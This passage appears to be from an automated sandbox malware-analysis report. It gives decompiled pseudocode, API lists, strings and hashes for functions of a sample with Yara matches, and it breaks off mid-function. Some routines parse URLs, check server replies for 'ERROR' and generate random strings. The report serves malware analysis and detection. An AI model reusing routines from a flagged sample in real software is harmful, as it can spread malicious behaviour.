                                                                    				 *((intOrPtr*)(_t82 - 0x54)) = 0;
                                                                    				E00404778(_t84, _t82 + 0x24);
                                                                    				_push(_t82 - 0x48);
                                                                    				_t43 = E0040A1C1(_t65, _t87);
                                                                    				 *((char*)(_t82 - 4)) = 3;
                                                                    				E004042ED(_t82 - 0x2c, _t43);
                                                                    				_t66 = _t82 - 0x48;
                                                                    				 *((char*)(_t82 - 4)) = 2;
                                                                    				E00404354(_t82 - 0x48, 1, 0);
                                                                    				_t46 =  *((intOrPtr*)(_t82 - 0x2c));
                                                                    				if( *((intOrPtr*)(_t82 - 0x18)) < 0x10) {
                                                                    					_t46 = _t82 - 0x2c;
                                                                    				}
                                                                    				_t81 = "ERROR";
                                                                    				_push("ERROR");
                                                                    				_push(_t46);
                                                                    				if( *0x446458() == 0) {
                                                                    					_t67 = 0x4442dc;
                                                                    					goto L12;
                                                                    				} else {
                                                                    					_t53 =  *((intOrPtr*)(_t82 + 8));
                                                                    					if( *((intOrPtr*)(_t82 + 0x1c)) < 0x10) {
                                                                    						_t53 = _t82 + 8;
                                                                    					}
                                                                    					if(E0040C06B(0, _t66, _t82 - 0x2c, _t53,  *((intOrPtr*)(_t82 + 0x18))) != 0xffffffff) {
                                                                    						E0040453E(_t82 - 0x2c, 0, _t56 + 6);
                                                                    						_t61 =  *((intOrPtr*)(_t82 - 0x2c));
                                                                    						if( *((intOrPtr*)(_t82 - 0x18)) < 0x10) {
                                                                    							_t61 = _t82 - 0x2c;
                                                                    						}
                                                                    						 *((intOrPtr*)(_t82 - 0x4c)) = E0041E87C(0, _t73, 1, _t61,  *((intOrPtr*)(_t82 - 0x50)), _t82 - 0x54);
                                                                    					}
                                                                    					_t57 =  *0x446320( *((intOrPtr*)(_t82 - 0x4c)));
                                                                    					_t67 = 0x4442dc;
                                                                    					if(_t57 < 1) {
                                                                    						L12:
                                                                    						E00404396(_t67, __eflags, _t81, 5);
                                                                    					} else {
                                                                    						E00404331(0x4442dc,  *((intOrPtr*)(_t82 - 0x4c)));
                                                                    					}
                                                                    				}
                                                                    				E00404354(_t82 - 0x2c, 1, 0);
                                                                    				E00404354(_t82 + 8, 1, 0);
                                                                    				E00404354(_t82 + 0x24, 1, 0);
                                                                    				return E00420888(0, 1, _t81);
                                                                    			}














                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040AA04
                                                                      • Part of subcall function 004042ED: _memmove.LIBCMT ref: 00404309
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    • StrCmpCA.SHLWAPI(?,ERROR,00000001,00000000), ref: 0040AA7A
                                                                    • _strtok_s.LIBCMT ref: 0040AAC5
                                                                    • lstrlen.KERNEL32(?,?,?,00000010), ref: 0040AAD3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _memmove$H_prolog3__strtok_slstrlen
                                                                    • String ID: ERROR
                                                                    • API String ID: 998862610-2861137601
                                                                    • Opcode ID: d521e578979a6c6202c0192e6a5a089e9fe64a6157c5fd6872e8fe02ae282fe7
                                                                    • Instruction ID: f66f733ea0f3a8ce8df2af2bb30762f59b533872b57ab822dd5dd657bc18bb23
                                                                    • Opcode Fuzzy Hash: d521e578979a6c6202c0192e6a5a089e9fe64a6157c5fd6872e8fe02ae282fe7
                                                                    • Instruction Fuzzy Hash: 9C3150B1D002089BDF14EFEAC8859DEBBB8AF59304F40812EF911B7181D7385944CFA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 68%
                                                                    			E0040AB1D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t35;
                                                                    				intOrPtr _t38;
                                                                    				intOrPtr _t47;
                                                                    				intOrPtr _t50;
                                                                    				void* _t55;
                                                                    				void* _t69;
                                                                    				void* _t70;
                                                                    				intOrPtr _t71;
                                                                    
                                                                    				_t66 = __esi;
                                                                    				_t62 = __edi;
                                                                    				_push(0x40);
                                                                    				E0042083E(E0043427F, __ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t69 - 4)) = 0;
                                                                    				 *((intOrPtr*)(_t69 - 0x18)) = 0xf;
                                                                    				 *((intOrPtr*)(_t69 - 0x1c)) = 0;
                                                                    				 *((char*)(_t69 - 0x2c)) = 0;
                                                                    				 *((char*)(_t69 - 4)) = 2;
                                                                    				_t74 =  *((intOrPtr*)(_t69 + 0x1c)) - 0x10;
                                                                    				_t50 =  *((intOrPtr*)(_t69 + 8));
                                                                    				if( *((intOrPtr*)(_t69 + 0x1c)) < 0x10) {
                                                                    					_t50 = _t69 + 8;
                                                                    				}
                                                                    				 *0x446458(E0040D694(_t50, _t62, _t66), "https");
                                                                    				_t71 = _t70 - 0x1c;
                                                                    				 *((intOrPtr*)(_t69 - 0x4c)) = _t71;
                                                                    				_push(_t69 + 8);
                                                                    				E0040C1B7(_t50, _t69 + 0x24, _t66, _t74);
                                                                    				_t55 = _t71;
                                                                    				_push(_t69 - 0x48);
                                                                    				_t35 = E0040A1C1(_t55, _t74);
                                                                    				 *((char*)(_t69 - 4)) = 3;
                                                                    				E004042ED(_t69 - 0x2c, _t35);
                                                                    				 *((char*)(_t69 - 4)) = 2;
                                                                    				E00404354(_t69 - 0x48, 1, 0);
                                                                    				_t38 =  *((intOrPtr*)(_t69 - 0x2c));
                                                                    				if( *((intOrPtr*)(_t69 - 0x18)) < 0x10) {
                                                                    					_t38 = _t69 - 0x2c;
                                                                    				}
                                                                    				_t68 = "ERROR";
                                                                    				_push("ERROR");
                                                                    				_push(_t38);
                                                                    				if( *0x446458() == 0) {
                                                                    					E00404396(0x4442dc, __eflags, _t68, 5);
                                                                    				} else {
                                                                    					E0040440A(0x4442dc, _t69 + 8, 0, 0xffffffff);
                                                                    					_t77 =  *((intOrPtr*)(_t69 - 0x18)) - 0x10;
                                                                    					_t47 =  *((intOrPtr*)(_t69 - 0x2c));
                                                                    					if( *((intOrPtr*)(_t69 - 0x18)) < 0x10) {
                                                                    						_t47 = _t69 - 0x2c;
                                                                    					}
                                                                    					E004085DE(1, _t77, _t47);
                                                                    				}
                                                                    				E00404354(_t69 - 0x2c, 1, 0);
                                                                    				E00404354(_t69 + 8, 1, 0);
                                                                    				E00404354(_t69 + 0x24, 1, 0);
                                                                    				return E00420888(1, 0, _t68);
                                                                    			}












                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040AB24
                                                                    • StrCmpCA.SHLWAPI(00000000,https,00000040,0040BA7E,004442DC), ref: 0040AB56
                                                                    • StrCmpCA.SHLWAPI(?,ERROR,00000001,00000000), ref: 0040ABB3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3_
                                                                    • String ID: ERROR$https
                                                                    • API String ID: 2427045233-230934144
                                                                    • Opcode ID: f45075964407f3bf01a0f3c34d58ae4fbd20835a7e01ca891d84aaca0ed77c92
                                                                    • Instruction ID: 90dd9704dbd00fac3d89226a42bd312acb49792eb78a2f1931c1aff0bf52622d
                                                                    • Opcode Fuzzy Hash: f45075964407f3bf01a0f3c34d58ae4fbd20835a7e01ca891d84aaca0ed77c92
                                                                    • Instruction Fuzzy Hash: E5216672900248AEDF04EBE9C8469DF7B789F55354F00446FFA15771C2DA386A44CBA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00404799(void* __eax, signed int __ecx, intOrPtr* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __ebp;
                                                                    				intOrPtr _t17;
                                                                    				void* _t18;
                                                                    				intOrPtr _t19;
                                                                    				intOrPtr* _t22;
                                                                    				intOrPtr* _t27;
                                                                    				void* _t28;
                                                                    				signed int _t29;
                                                                    				intOrPtr* _t33;
                                                                    				intOrPtr _t35;
                                                                    				intOrPtr* _t37;
                                                                    				void* _t38;
                                                                    
                                                                    				_t37 = __esi;
                                                                    				_t29 = __ecx;
                                                                    				_t28 = __eax;
                                                                    				_t17 =  *((intOrPtr*)(_a4 + 0x10));
                                                                    				if(_t17 < _a8) {
                                                                    					_t17 = E0041CFED("invalid string position");
                                                                    				}
                                                                    				_t18 = _t17 - _a8;
                                                                    				if(_t18 < _t28) {
                                                                    					_t28 = _t18;
                                                                    				}
                                                                    				_t19 =  *((intOrPtr*)(_t37 + 0x10));
                                                                    				if((_t29 | 0xffffffff) - _t19 <= _t28) {
                                                                    					_t19 = E0041CFA0("string too long");
                                                                    				}
                                                                    				if(_t28 != 0) {
                                                                    					_t35 = _t19 + _t28;
                                                                    					if(E004044A3(_t28, _t37, _t35, _t38, _t35, 0) != 0) {
                                                                    						_t22 = _a4;
                                                                    						if( *((intOrPtr*)(_t22 + 0x14)) >= 0x10) {
                                                                    							_t22 =  *_t22;
                                                                    						}
                                                                    						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                    							_t33 = _t37;
                                                                    						} else {
                                                                    							_t33 =  *_t37;
                                                                    						}
                                                                    						E00420090( *((intOrPtr*)(_t37 + 0x10)) + _t33, _t22 + _a8, _t28);
                                                                    						 *((intOrPtr*)(_t37 + 0x10)) = _t35;
                                                                    						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                    							_t27 = _t37;
                                                                    						} else {
                                                                    							_t27 =  *_t37;
                                                                    						}
                                                                    						 *((char*)(_t27 + _t35)) = 0;
                                                                    					}
                                                                    				}
                                                                    				return _t37;
                                                                    			}


















                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004047AF
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D002
                                                                      • Part of subcall function 0041CFED: __CxxThrowException@8.LIBCMT ref: 0041D017
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D028
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004047CE
                                                                    • _memmove.LIBCMT ref: 0040480B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                    • String ID: invalid string position$string too long
                                                                    • API String ID: 3404309857-4289949731
                                                                    • Opcode ID: b0dccce2164e6abae88e0659682b1c97b8ba73b75cd5a73ca4091544359ef5fa
                                                                    • Instruction ID: 06192025c113f57125c650266fd048f92f2f53487dcd0e52fcfd683f5553d66c
                                                                    • Opcode Fuzzy Hash: b0dccce2164e6abae88e0659682b1c97b8ba73b75cd5a73ca4091544359ef5fa
                                                                    • Instruction Fuzzy Hash: 2F1194B13002409FDB24EE2CD9C1A16B3E5EF86714B10493EF652EB6D1D778E9408799
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00417C5A(signed int __ecx, void* __edi, intOrPtr* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
                                                                    				void* __ebx;
                                                                    				intOrPtr _t11;
                                                                    				intOrPtr _t14;
                                                                    				intOrPtr* _t15;
                                                                    				intOrPtr* _t21;
                                                                    				intOrPtr _t23;
                                                                    				intOrPtr _t24;
                                                                    				signed int _t25;
                                                                    				intOrPtr* _t29;
                                                                    				void* _t35;
                                                                    				intOrPtr* _t36;
                                                                    				void* _t37;
                                                                    
                                                                    				_t37 = __ebp;
                                                                    				_t36 = __esi;
                                                                    				_t35 = __edi;
                                                                    				_t25 = __ecx;
                                                                    				_t23 =  *((intOrPtr*)(__esi + 0x10));
                                                                    				if(_t23 < __edi) {
                                                                    					E0041CFED("invalid string position");
                                                                    				}
                                                                    				_t11 = _a4;
                                                                    				if((_t25 | 0xffffffff) - _t23 <= _t11) {
                                                                    					_t11 = E0041CFA0("string too long");
                                                                    				}
                                                                    				if(_t11 != 0) {
                                                                    					_t24 = _t23 + _t11;
                                                                    					if(E004044A3(_t24, _t36, _t35, _t37, _t24, 0) != 0) {
                                                                    						_t14 =  *((intOrPtr*)(_t36 + 0x14));
                                                                    						if(_t14 < 0x10) {
                                                                    							_t29 = _t36;
                                                                    						} else {
                                                                    							_t29 =  *_t36;
                                                                    						}
                                                                    						if(_t14 < 0x10) {
                                                                    							_t15 = _t36;
                                                                    						} else {
                                                                    							_t15 =  *_t36;
                                                                    						}
                                                                    						E0041DCF0(_t15 + _t35 + _a4, _t29 + _t35,  *((intOrPtr*)(_t36 + 0x10)) - _t35);
                                                                    						E0040C185(_t36, _t35, _a8, _a4);
                                                                    						 *((intOrPtr*)(_t36 + 0x10)) = _t24;
                                                                    						if( *((intOrPtr*)(_t36 + 0x14)) < 0x10) {
                                                                    							_t21 = _t36;
                                                                    						} else {
                                                                    							_t21 =  *_t36;
                                                                    						}
                                                                    						 *((char*)(_t21 + _t24)) = 0;
                                                                    					}
                                                                    				}
                                                                    				return _t36;
                                                                    			}
















                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417C67
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D002
                                                                      • Part of subcall function 0041CFED: __CxxThrowException@8.LIBCMT ref: 0041D017
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D028
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417C7E
                                                                    • _memmove.LIBCMT ref: 00417CC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                    • String ID: invalid string position$string too long
                                                                    • API String ID: 3404309857-4289949731
                                                                    • Opcode ID: 8ac08005b56f26802e3a6449e88d96a40140e51abd020bb49937287e1b8d79a2
                                                                    • Instruction ID: 5d32071b40c850619f8de39f48f48a86f3dd8e3609f11ec63f8c4fba43319f1d
                                                                    • Opcode Fuzzy Hash: 8ac08005b56f26802e3a6449e88d96a40140e51abd020bb49937287e1b8d79a2
                                                                    • Instruction Fuzzy Hash: 3D11C67030820057D6249E2CCDD1A5FB7F6AB80700B24091EF092973C2EB68D88487DD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 22%
                                                                    			E0040E2EF(char* _a4) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				char _v24;
                                                                    				char* _t17;
                                                                    				signed char _t19;
                                                                    				char* _t26;
                                                                    				intOrPtr _t28;
                                                                    
                                                                    				_t17 = 0;
                                                                    				if(_a4 == 0) {
                                                                    					L3:
                                                                    					_t19 =  *(_t26 + 0x10) &  *(_t26 + 0xc);
                                                                    					if((_t19 & 0x00000004) == 0) {
                                                                    						if((_t19 & 0x00000002) == 0) {
                                                                    							_t28 = E0041D0E3();
                                                                    							_a4 = "ios_base::eofbit set";
                                                                    						} else {
                                                                    							_t28 = E0041D0E3();
                                                                    							_a4 = "ios_base::failbit set";
                                                                    						}
                                                                    					} else {
                                                                    						_t28 = E0041D0E3();
                                                                    						_a4 = "ios_base::badbit set";
                                                                    					}
                                                                    					_t26 =  &_v24;
                                                                    					E0041DC00(_t26,  &_a4);
                                                                    					_v12 = 1;
                                                                    					_v8 = _t28;
                                                                    					_v24 = 0x43f3d8;
                                                                    					_push(0x440cc4);
                                                                    					_t17 =  &_v24;
                                                                    					goto L2;
                                                                    				} else {
                                                                    					_push(0);
                                                                    					L2:
                                                                    					_push(_t17);
                                                                    					E0041FF86();
                                                                    					goto L3;
                                                                    				}
                                                                    			}











                                                                    APIs
                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E300
                                                                    • std::exception::exception.LIBCMT ref: 0040E327
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 3728558374-1866435925
                                                                    • Opcode ID: 7de800bcf879f97ebb41801f591740d754f2f675f7563ffbb9479eb7d4ae25c5
                                                                    • Instruction ID: ba445088deea3d3149b953072594bd5e8f0754741f753fd0473410ed9c71ae23
                                                                    • Opcode Fuzzy Hash: 7de800bcf879f97ebb41801f591740d754f2f675f7563ffbb9479eb7d4ae25c5
                                                                    • Instruction Fuzzy Hash: 7B01A7B0C04204AACB04EF55C5455EE7FB89E08348F24843BEC04AB242D778DA5BC7E9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 67%
                                                                    			E0040D694(char* __ebx, void* __edi, void* __esi) {
                                                                    				signed int _v8;
                                                                    				char _v72;
                                                                    				intOrPtr _v124;
                                                                    				char* _v128;
                                                                    				char _v132;
                                                                    				signed int _t11;
                                                                    				int _t20;
                                                                    				char* _t21;
                                                                    				void* _t26;
                                                                    				void* _t27;
                                                                    				void* _t28;
                                                                    				signed int _t29;
                                                                    
                                                                    				_t28 = __esi;
                                                                    				_t27 = __edi;
                                                                    				_t23 = __ebx;
                                                                    				_t11 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t11 ^ _t29;
                                                                    				E00426300( &_v72, 0, 0x40);
                                                                    				E00426300( &_v132, 0, 0x3c);
                                                                    				_v128 =  &_v72;
                                                                    				_v132 = 0x3c;
                                                                    				_v124 = 0x40;
                                                                    				_t20 = InternetCrackUrlA(__ebx,  *0x446320( &_v132), __ebx, 0x10000000);
                                                                    				_t21 = _v128;
                                                                    				if(_t20 == 0) {
                                                                    					_t21 = "http";
                                                                    				}
                                                                    				return E0041DA9B(_t21, _t23, _v8 ^ _t29, _t26, _t27, _t28);
                                                                    			}
















                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040D6AF
                                                                    • _memset.LIBCMT ref: 0040D6BC
                                                                    • lstrlen.KERNEL32(00000000,10000000,?), ref: 0040D6E2
                                                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 0040D6EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _memset$CrackInternetlstrlen
                                                                    • String ID: http
                                                                    • API String ID: 3332450456-2541227442
                                                                    • Opcode ID: 1056a3929cd8480c818694b59083ebc0ab15a09be4e179cdb1ef95ad67b8bb3d
                                                                    • Instruction ID: a9c41bcf58f08eebd03907196340c9c098e0e8238ebe52ca876836c33f03ab8c
                                                                    • Opcode Fuzzy Hash: 1056a3929cd8480c818694b59083ebc0ab15a09be4e179cdb1ef95ad67b8bb3d
                                                                    • Instruction Fuzzy Hash: 7901EB70A00248ABDB10DFA5DD45F9D77BCAB05704F91402DF505F7181D774A5088B59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E00415EF6(void* __eax, void* __eflags) {
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t11;
                                                                    				void* _t14;
                                                                    				signed int _t17;
                                                                    				void* _t18;
                                                                    				void* _t20;
                                                                    				void* _t21;
                                                                    				CHAR* _t22;
                                                                    				void* _t23;
                                                                    
                                                                    				_t20 = __eax;
                                                                    				_t22 = E0041DAE4(_t18, __eax, _t21, __eax);
                                                                    				 *_t22 = 0;
                                                                    				E0041FD60(GetTickCount());
                                                                    				_t14 = 0;
                                                                    				_t25 = _t20;
                                                                    				if(_t20 > 0) {
                                                                    					_t14 = _t20;
                                                                    					do {
                                                                    						_t11 = E0041FD72(_t25);
                                                                    						_t17 = 0xa;
                                                                    						asm("cdq");
                                                                    						wsprintfA(_t22, "%s%d", _t22, _t11 % _t17);
                                                                    						_t23 = _t23 + 0x10;
                                                                    						_t20 = _t20 - 1;
                                                                    					} while (_t20 != 0);
                                                                    				}
                                                                    				 *((char*)(_t14 + _t22)) = 0;
                                                                    				return _t22;
                                                                    			}














                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 0041DAE4: __FF_MSGBANNER.LIBCMT ref: 0041DAFD
                                                                      • Part of subcall function 0041DAE4: __NMSG_WRITE.LIBCMT ref: 0041DB04
                                                                      • Part of subcall function 0041DAE4: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00403F3E,00000010), ref: 0041DB29
                                                                    • GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 0041FD60: __getptd.LIBCMT ref: 0041FD65
                                                                    • _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 0041FD72: __getptd.LIBCMT ref: 0041FD72
                                                                    • wsprintfA.USER32 ref: 00415F2F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __getptd$AllocateCountHeapTick_malloc_randwsprintf
                                                                    • String ID: %s%d
                                                                    • API String ID: 2840978672-1110647743
                                                                    • Opcode ID: 4d7039b94c0342081bf3ce7441a758766c3d5d60c5532e489910ab932e200d9e
                                                                    • Instruction ID: 23ba52ee1f68e2952334585a0200fe4858569359bb45ddc6a97065bd652cc868
                                                                    • Opcode Fuzzy Hash: 4d7039b94c0342081bf3ce7441a758766c3d5d60c5532e489910ab932e200d9e
                                                                    • Instruction Fuzzy Hash: B9E02B72305A506AE61167BDAC85BBB5A5CDFC37B5F24006FF14886242DA9C4C82826E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E004146A9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t21;
                                                                    				intOrPtr* _t23;
                                                                    				intOrPtr* _t25;
                                                                    				void* _t26;
                                                                    				void* _t27;
                                                                    
                                                                    				_t27 = __eflags;
                                                                    				_t22 = __edi;
                                                                    				_t17 = __ebx;
                                                                    				_push(0);
                                                                    				E004207D5(E004338FE, __ebx, __edi, __esi);
                                                                    				_t25 =  *((intOrPtr*)(_t26 + 8));
                                                                    				 *_t25 = 0x43f30c;
                                                                    				E0041D5FC(_t25 + 4, __edi, _t27);
                                                                    				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                                                                    				_t23 = E0041E24D(__ebx, _t21, _t22, _t25, _t27, 4);
                                                                    				_t28 = _t23;
                                                                    				if(_t23 == 0) {
                                                                    					_t23 = 0;
                                                                    					__eflags = 0;
                                                                    				} else {
                                                                    					 *_t23 = E0041D4D4(_t17, _t23, _t25, _t28);
                                                                    					E0040E094(E0041D293());
                                                                    				}
                                                                    				 *((intOrPtr*)(_t25 + 0x38)) = _t23;
                                                                    				E00414712(_t25);
                                                                    				return E00420874(_t25);
                                                                    			}









                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004146B0
                                                                    • std::_Mutex::_Mutex.LIBCPMT ref: 004146C1
                                                                      • Part of subcall function 0041E24D: _malloc.LIBCMT ref: 0041E267
                                                                    • std::locale::_Init.LIBCPMT ref: 004146D8
                                                                      • Part of subcall function 0041D4D4: __EH_prolog3.LIBCMT ref: 0041D4DB
                                                                      • Part of subcall function 0041D4D4: std::_Lockit::_Lockit.LIBCPMT ref: 0041D4F1
                                                                      • Part of subcall function 0041D4D4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0041D513
                                                                      • Part of subcall function 0041D4D4: std::locale::_Setgloballocale.LIBCPMT ref: 0041D51D
                                                                      • Part of subcall function 0041D4D4: _Yarn.LIBCPMT ref: 0041D533
                                                                      • Part of subcall function 0041D4D4: std::locale::facet::_Incref.LIBCPMT ref: 0041D540
                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 004146E6
                                                                      • Part of subcall function 0040E094: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::_std::locale::_$H_prolog3IncrefLockitLockit::_std::locale::facet::_$InitLocimpLocimp::_MutexMutex::_SetgloballocaleYarn_malloc
                                                                    • String ID: xBA
                                                                    • API String ID: 3596770912-1714928763
                                                                    • Opcode ID: 9bd816609df7ddfd60863e44b0b28cc0bc72e95e388cde0d20e8a348159e5d96
                                                                    • Instruction ID: ce15863250ec3f8408497e7952f09512986a565dd23bcd97c0d49abc526cf548
                                                                    • Opcode Fuzzy Hash: 9bd816609df7ddfd60863e44b0b28cc0bc72e95e388cde0d20e8a348159e5d96
                                                                    • Instruction Fuzzy Hash: 49F0E5B9E0021297C704BFB7800239D63D15F9071CF10442FB6519B282DF7CA981874D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 91%
                                                                    			E00413EC2(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
                                                                    				void* _t54;
                                                                    				intOrPtr _t56;
                                                                    				signed int _t59;
                                                                    				intOrPtr _t64;
                                                                    				intOrPtr _t71;
                                                                    				void* _t89;
                                                                    				intOrPtr _t103;
                                                                    				signed int _t106;
                                                                    				intOrPtr _t107;
                                                                    				signed int _t108;
                                                                    				void* _t109;
                                                                    
                                                                    				_t106 = __esi;
                                                                    				_push(0x2c);
                                                                    				E0042083E(E00433C31, __ebx, __edi, __esi);
                                                                    				_t105 = __ecx;
                                                                    				_t51 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))));
                                                                    				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) == 0) {
                                                                    					L4:
                                                                    					__eflags =  *(_t105 + 0x54);
                                                                    					if( *(_t105 + 0x54) != 0) {
                                                                    						E004145CB(_t105);
                                                                    						__eflags =  *(_t105 + 0x44);
                                                                    						if(__eflags != 0) {
                                                                    							 *((intOrPtr*)(_t109 - 0x18)) = 0xf;
                                                                    							 *((intOrPtr*)(_t109 - 0x1c)) = 0;
                                                                    							 *((char*)(_t109 - 0x2c)) = 0;
                                                                    							 *((intOrPtr*)(_t109 - 4)) = 0;
                                                                    							_push( *(_t105 + 0x54));
                                                                    							_t54 = E0041F65A(0, _t105, _t106, __eflags);
                                                                    							_t83 = 1;
                                                                    							while(1) {
                                                                    								_pop(_t89);
                                                                    								__eflags = _t54 - 0xffffffff;
                                                                    								if(_t54 == 0xffffffff) {
                                                                    									break;
                                                                    								}
                                                                    								_t107 = _t109 - 0x2c;
                                                                    								E0040C3CF(_t83, _t89, _t107, _t109, _t54);
                                                                    								__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
                                                                    								_t103 =  *((intOrPtr*)(_t109 - 0x2c));
                                                                    								_t56 = _t103;
                                                                    								if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
                                                                    									_t56 = _t107;
                                                                    									_t103 = _t107;
                                                                    								}
                                                                    								_t106 =  *( *(_t105 + 0x44));
                                                                    								_t83 = _t109 - 0x34;
                                                                    								_t59 =  *((intOrPtr*)(_t106 + 0x10))(_t105 + 0x4c, _t103, _t56 +  *((intOrPtr*)(_t109 - 0x1c)), _t109 - 0x34, _t109 - 0x2d, _t109 - 0x2c, _t109 - 0x38);
                                                                    								__eflags = _t59;
                                                                    								if(_t59 < 0) {
                                                                    									break;
                                                                    								} else {
                                                                    									_t83 = 1;
                                                                    									__eflags = _t59 - 1;
                                                                    									if(_t59 <= 1) {
                                                                    										__eflags =  *((intOrPtr*)(_t109 - 0x38)) - _t109 - 0x2d;
                                                                    										_t64 =  *((intOrPtr*)(_t109 - 0x2c));
                                                                    										if( *((intOrPtr*)(_t109 - 0x38)) != _t109 - 0x2d) {
                                                                    											__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
                                                                    											if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
                                                                    												_t64 = _t109 - 0x2c;
                                                                    											}
                                                                    											_t108 = _t64 -  *((intOrPtr*)(_t109 - 0x34)) +  *((intOrPtr*)(_t109 - 0x1c));
                                                                    											while(1) {
